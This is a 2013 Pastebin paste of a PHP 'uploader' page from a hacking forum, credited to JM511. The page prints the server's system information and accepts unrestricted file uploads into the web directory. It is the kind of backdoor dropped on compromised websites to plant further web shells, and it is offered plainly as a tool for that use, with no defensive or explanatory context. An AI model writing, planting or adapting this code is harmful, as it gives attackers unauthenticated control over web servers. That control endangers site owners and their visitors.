Advertisement
Islam-Hacker

Is-Sec Uploader :: JM511 ::

Apr 26th, 2013
472
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.32 KB | None | 0 0
  1. <!--                                           www.is-sec.com/vb  - by JM511 - upload file php                                        -->
  2. <head><link type="image/x-icon" href="http://www.is-sec.com/vb/images/Is-sec/images/header_02.png" rel="icon"/><style><!--p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}-->Is-Sec Uploader</style><meta name="keywords" content="HTC 28 DZ - Upload"><meta name="description" content="HTC 28 DZ - Upload"></head><title>Is-Sec Uploader</title><p style="text-align: center;"><table style="BORDER-COLLAPSE: collapse" cellspacing="0" bordercolordark="#000000" cellpadding="5" height="1" width="100%" bgcolor="#FF0000" bordercolorlight="#c0c0c0" border="1">    <tr>        <a bookmark="minipanel" style="font-weight: normal; color: #009900; font-family: verdana; text-decoration: none">        <td width="50%" height="1" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px">        <center>  <span></span><span style="color:#FFFFFF;">Twitter : @JM511    </span>                <form method="POST" enctype="multipart/form-data">            <input type="hidden" name="act" value="upload" style="font-size: 8pt; color: #Fnt-familyFFFFF; fo: Tahoma; border: 1 solid #666666; background-color: #009900; font-weight:700">            <input type="file" name="userfile" style="font-size: 10pt; color: #005f00; font-family: Tahoma; border: 1 solid #00FF00; background-color: #000000; font-weight:700"><input type="hidden" name="miniform" value="1" style="font-size: 8pt; color: #000000; font-family: Tahoma; border: 1 solid #000000; background-color: #000000; font-weight:700"><b>            </b>            <input type="submit" name="submit" value="Upload" style="font-size: 8pt; color: #000000; font-family: Tahoma; border: 1 solid #000000; background-color: #FFFFFF; font-weight:700"><b>                        <?php echo '<b><br><br>'.php_uname().'<br></b>'; $uploaddir = ""; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if (isset($_FILES['userfile']['name'])) {  if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {  echo "The file ". basename($_FILES['userfile']['name']) ." has been uploaded"; } else {  echo "There was an error uploading the file. please try again!";  } } ?>             <br>Jone us : <input type="text" name="action" value="www.is-sec.com/vb/" size="26"><br>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement